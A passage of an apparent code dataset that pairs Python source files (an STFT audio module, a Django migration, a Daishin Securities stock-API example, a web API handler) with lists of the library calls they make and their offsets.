if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| [
"os.path.exists",
"os.listdir",
"os.environ.get",
"configparser.ConfigParser"
]
| [((9646, 9673), 'os.listdir', 'os.listdir', (['f"""assets/items"""'], {}), "(f'assets/items')\n", (9656, 9673), False, 'import os\n'), ((871, 898), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (896, 898), False, 'import configparser\n'), ((976, 1003), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1001, 1003), False, 'import configparser\n'), ((1086, 1113), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1111, 1113), False, 'import configparser\n'), ((1198, 1225), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1223, 1225), False, 'import configparser\n'), ((1301, 1328), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1326, 1328), False, 'import configparser\n'), ((1381, 1416), 'os.path.exists', 'os.path.exists', (['"""config/custom.ini"""'], {}), "('config/custom.ini')\n", (1395, 1416), False, 'import os\n'), ((9484, 9525), 'os.path.exists', 'os.path.exists', (['f"""./assets/items/{k}.png"""'], {}), "(f'./assets/items/{k}.png')\n", (9498, 9525), False, 'import os\n'), ((1341, 1366), 'os.environ.get', 'os.environ.get', (['"""RUN_ENV"""'], {}), "('RUN_ENV')\n", (1355, 1366), False, 'import os\n'), ((7826, 7869), 'os.path.exists', 'os.path.exists', (['f"""./assets/items/{key}.png"""'], {}), "(f'./assets/items/{key}.png')\n", (7840, 7869), False, 'import os\n')] |
# Copyright 2019 <NAME>
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| [
"torch.nn.functional.conv1d",
"math.log2",
"torch.hann_window",
"torch.sin",
"torch.cos",
"torch.sum",
"torch.nn.functional.pad",
"torch.repeat_interleave",
"torch.arange",
"numpy.arange",
"math.gcd",
"torch.unsqueeze",
"torch.eye",
"torch.matmul",
"numpy.abs",
"torch.transpose",
"librosa.filters.mel",
"numpy.cos",
"torch.reshape",
"torch.clamp",
"torch.cat",
"torch.index_select",
"torch.stack",
"torch.atan2",
"numpy.sinc",
"torch.fft",
"torch.tensor",
"torch.chunk",
"torch.nn.Parameter",
"torch.nn.functional.conv_transpose1d",
"torch.zeros",
"torch.nn.functional.unfold"
]
| [((2301, 2317), 'torch.fft', 'th.fft', (['(I / S)', '(1)'], {}), '(I / S, 1)\n', (2307, 2317), True, 'import torch as th\n'), ((2531, 2569), 'torch.reshape', 'th.reshape', (['K', '(B * 2, 1, K.shape[-1])'], {}), '(K, (B * 2, 1, K.shape[-1]))\n', (2541, 2569), True, 'import torch as th\n'), ((3742, 3847), 'librosa.filters.mel', 'filters.mel', (['sr', 'N'], {'n_mels': 'num_mels', 'fmax': 'fmax', 'fmin': 'fmin', 'htk': '(True)', 'norm': "('slaney' if norm else None)"}), "(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm=\n 'slaney' if norm else None)\n", (3753, 3847), True, 'import librosa.filters as filters\n'), ((4016, 4048), 'torch.tensor', 'th.tensor', (['mel'], {'dtype': 'th.float32'}), '(mel, dtype=th.float32)\n', (4025, 4048), True, 'import torch as th\n'), ((4687, 4711), 'math.gcd', 'math.gcd', (['src_sr', 'dst_sr'], {}), '(src_sr, dst_sr)\n', (4695, 4711), False, 'import math\n'), ((5445, 5480), 'torch.tensor', 'th.tensor', (['weight'], {'dtype': 'th.float32'}), '(weight, dtype=th.float32)\n', (5454, 5480), True, 'import torch as th\n'), ((8678, 8705), 'torch.chunk', 'th.chunk', (['packed', '(2)'], {'dim': '(-2)'}), '(packed, 2, dim=-2)\n', (8686, 8705), True, 'import torch as th\n'), ((10915, 10942), 'torch.cat', 'th.cat', (['[real, imag]'], {'dim': '(1)'}), '([real, imag], dim=1)\n', (10921, 10942), True, 'import torch as th\n'), ((10967, 11031), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (['packed', 'kernel'], {'stride': 'frame_hop', 'padding': '(0)'}), '(packed, kernel, stride=frame_hop, padding=0)\n', (10986, 11031), True, 'import torch.nn.functional as tf\n'), ((11211, 11282), 'torch.repeat_interleave', 'th.repeat_interleave', (['window[None, ..., None]', 'packed.shape[-1]'], {'dim': '(-1)'}), '(window[None, ..., None], packed.shape[-1], dim=-1)\n', (11231, 11282), True, 'import torch as th\n'), ((11448, 11509), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (['(win ** 2)', 'I'], {'stride': 'frame_hop', 'padding': '(0)'}), '(win ** 2, I, stride=frame_hop, padding=0)\n', (11467, 11509), True, 'import torch.nn.functional as tf\n'), ((2089, 2133), 'torch.nn.functional.pad', 'tf.pad', (['window', '(lpad, B - frame_len - lpad)'], {}), '(window, (lpad, B - frame_len - lpad))\n', (2095, 2133), True, 'import torch.nn.functional as tf\n'), ((2475, 2496), 'torch.transpose', 'th.transpose', (['K', '(0)', '(2)'], {}), '(K, 0, 2)\n', (2487, 2496), True, 'import torch as th\n'), ((6296, 6352), 'torch.arange', 'th.arange', (['c', '(c + T)'], {'device': 'feats.device', 'dtype': 'th.int64'}), '(c, c + T, device=feats.device, dtype=th.int64)\n', (6305, 6352), True, 'import torch as th\n'), ((6367, 6398), 'torch.clamp', 'th.clamp', (['idx'], {'min': '(0)', 'max': '(T - 1)'}), '(idx, min=0, max=T - 1)\n', (6375, 6398), True, 'import torch as th\n'), ((6515, 6530), 'torch.cat', 'th.cat', (['ctx', '(-1)'], {}), '(ctx, -1)\n', (6521, 6530), True, 'import torch as th\n'), ((6588, 6605), 'torch.stack', 'th.stack', (['ctx', '(-1)'], {}), '(ctx, -1)\n', (6596, 6605), True, 'import torch as th\n'), ((8010, 8049), 'torch.nn.functional.pad', 'tf.pad', (['wav', '(pad, pad)'], {'mode': '"""reflect"""'}), "(wav, (pad, pad), mode='reflect')\n", (8016, 8049), True, 'import torch.nn.functional as tf\n'), ((8124, 8199), 'torch.nn.functional.unfold', 'tf.unfold', (['wav[:, None]', '(1, kernel.shape[-1])'], {'stride': 'frame_hop', 'padding': '(0)'}), '(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0)\n', (8133, 8199), True, 'import torch.nn.functional as tf\n'), ((8388, 8430), 'torch.matmul', 'th.matmul', (['kernel[:, 0][None, ...]', 'frames'], {}), '(kernel[:, 0][None, ...], frames)\n', (8397, 8430), True, 'import torch as th\n'), ((8458, 8509), 'torch.nn.functional.conv1d', 'tf.conv1d', (['wav', 'kernel'], {'stride': 'frame_hop', 'padding': '(0)'}), '(wav, kernel, stride=frame_hop, padding=0)\n', (8467, 8509), True, 'import torch.nn.functional as tf\n'), ((10569, 10590), 'torch.unsqueeze', 'th.unsqueeze', (['real', '(0)'], {}), '(real, 0)\n', (10581, 10590), True, 'import torch as th\n'), ((10606, 10627), 'torch.unsqueeze', 'th.unsqueeze', (['imag', '(0)'], {}), '(imag, 0)\n', (10618, 10627), True, 'import torch as th\n'), ((10791, 10826), 'torch.cat', 'th.cat', (['[real, real[:, reverse]]', '(1)'], {}), '([real, real[:, reverse]], 1)\n', (10797, 10826), True, 'import torch as th\n'), ((10842, 10878), 'torch.cat', 'th.cat', (['[imag, -imag[:, reverse]]', '(1)'], {}), '([imag, -imag[:, reverse]], 1)\n', (10848, 10878), True, 'import torch as th\n'), ((11369, 11411), 'torch.eye', 'th.eye', (['window.shape[0]'], {'device': 'win.device'}), '(window.shape[0], device=win.device)\n', (11375, 11411), True, 'import torch as th\n'), ((16516, 16552), 'torch.nn.Parameter', 'nn.Parameter', (['K'], {'requires_grad': '(False)'}), '(K, requires_grad=False)\n', (16528, 16552), True, 'import torch.nn as nn\n'), ((16570, 16606), 'torch.nn.Parameter', 'nn.Parameter', (['w'], {'requires_grad': '(False)'}), '(w, requires_grad=False)\n', (16582, 16606), True, 'import torch.nn as nn\n'), ((17281, 17314), 'torch.sum', 'th.sum', (['(wav_len <= self.frame_len)'], {}), '(wav_len <= self.frame_len)\n', (17287, 17314), True, 'import torch as th\n'), ((543, 587), 'torch.hann_window', 'th.hann_window', (['frame_len'], {'periodic': 'periodic'}), '(frame_len, periodic=periodic)\n', (557, 587), True, 'import torch as th\n'), ((2241, 2250), 'torch.eye', 'th.eye', (['B'], {}), '(B)\n', (2247, 2250), True, 'import torch as th\n'), ((2252, 2266), 'torch.zeros', 'th.zeros', (['B', 'B'], {}), '(B, B)\n', (2260, 2266), True, 'import torch as th\n'), ((6418, 6449), 'torch.index_select', 'th.index_select', (['feats', '(-2)', 'idx'], {}), '(feats, -2, idx)\n', (6433, 6449), True, 'import torch as th\n'), ((8969, 8999), 'torch.stack', 'th.stack', (['[real, imag]'], {'dim': '(-1)'}), '([real, imag], dim=-1)\n', (8977, 8999), True, 'import torch as th\n'), ((9073, 9093), 'torch.atan2', 'th.atan2', (['imag', 'real'], {}), '(imag, real)\n', (9081, 9093), True, 'import torch as th\n'), ((1896, 1916), 'math.log2', 'math.log2', (['frame_len'], {}), '(frame_len)\n', (1905, 1916), False, 'import math\n'), ((5147, 5173), 'numpy.arange', 'np.arange', (['(2 * padding + 1)'], {}), '(2 * padding + 1)\n', (5156, 5173), True, 'import numpy as np\n'), ((5230, 5253), 'numpy.abs', 'np.abs', (['(times / padding)'], {}), '(times / padding)\n', (5236, 5253), True, 'import numpy as np\n'), ((5301, 5334), 'numpy.cos', 'np.cos', (['(times / padding * math.pi)'], {}), '(times / padding * math.pi)\n', (5307, 5334), True, 'import numpy as np\n'), ((5349, 5381), 'numpy.sinc', 'np.sinc', (['(times * zeros_per_block)'], {}), '(times * zeros_per_block)\n', (5356, 5381), True, 'import numpy as np\n'), ((10236, 10256), 'torch.cos', 'th.cos', (['transform[1]'], {}), '(transform[1])\n', (10242, 10256), True, 'import torch as th\n'), ((10287, 10307), 'torch.sin', 'th.sin', (['transform[1]'], {}), '(transform[1])\n', (10293, 10307), True, 'import torch as th\n'), ((3408, 3428), 'math.log2', 'math.log2', (['frame_len'], {}), '(frame_len)\n', (3417, 3428), False, 'import math\n'), ((5019, 5036), 'numpy.arange', 'np.arange', (['dst_sr'], {}), '(dst_sr)\n', (5028, 5036), True, 'import numpy as np\n'), ((5083, 5100), 'numpy.arange', 'np.arange', (['src_sr'], {}), '(src_sr)\n', (5092, 5100), True, 'import numpy as np\n')] |
# Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| [
"django.db.migrations.DeleteModel"
]
| [((226, 276), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""HiddenStatus_Budget"""'}), "(name='HiddenStatus_Budget')\n", (248, 276), False, 'from django.db import migrations\n')] |
# 대신증권 API
# 데이터 요청 방법 2가지 BlockRequest 와 Request 방식 비교 예제
# 플러스 API 에서 데이터를 요청하는 방법은 크게 2가지가 있습니다
#
# BlockRequest 방식 - 가장 간단하게 데이터 요청해서 수신 가능
# Request 호출 후 Received 이벤트로 수신 받기
#
# 아래는 위 2가지를 비교할 수 있도록 만든 예제 코드입니다
# 일반적인 데이터 요청에는 BlockRequest 방식이 가장 간단합니다
# 다만, BlockRequest 함수 내에서도 동일 하게 메시지펌핑을 하고 있어 해당 통신이 마치기 전에 실시간 시세를 수신 받거나
# 다른 이벤트에 의해 재귀 호출 되는 문제가 있을 경우 함수 호출이 실패할 수 있습니다
# 복잡한 실시간 시세 수신 중에 통신을 해야 하는 경우에는 Request 방식을 이용해야 합니다.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
self.client = client # CP 실시간 통신 object
self.name = name # 서비스가 다른 이벤트를 구분하기 위한 이름
self.caller = caller # callback 을 위해 보관
def OnReceived(self):
# 실시간 처리 - 현재가 주문 체결
if self.name == 'stockmst':
print('recieved')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest 로 수신 받은 데이터')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
print('')
##############################################################
# 2. Request ==> 메시지 펌프 ==> OnReceived 이벤트 수신
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
| [
"win32event.SetEvent",
"pythoncom.PumpWaitingMessages",
"win32event.CreateEvent",
"win32event.MsgWaitForMultipleObjects"
]
| [((629, 669), 'win32event.CreateEvent', 'win32event.CreateEvent', (['None', '(0)', '(0)', 'None'], {}), '(None, 0, 0, None)\n', (651, 669), False, 'import win32event\n'), ((1438, 1527), 'win32event.MsgWaitForMultipleObjects', 'win32event.MsgWaitForMultipleObjects', (['waitables', '(0)', 'timeout', 'win32event.QS_ALLEVENTS'], {}), '(waitables, 0, timeout, win32event.\n QS_ALLEVENTS)\n', (1474, 1527), False, 'import win32event\n'), ((1032, 1062), 'win32event.SetEvent', 'win32event.SetEvent', (['StopEvent'], {}), '(StopEvent)\n', (1051, 1062), False, 'import win32event\n'), ((2236, 2267), 'pythoncom.PumpWaitingMessages', 'pythoncom.PumpWaitingMessages', ([], {}), '()\n', (2265, 2267), False, 'import pythoncom\n')] |
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
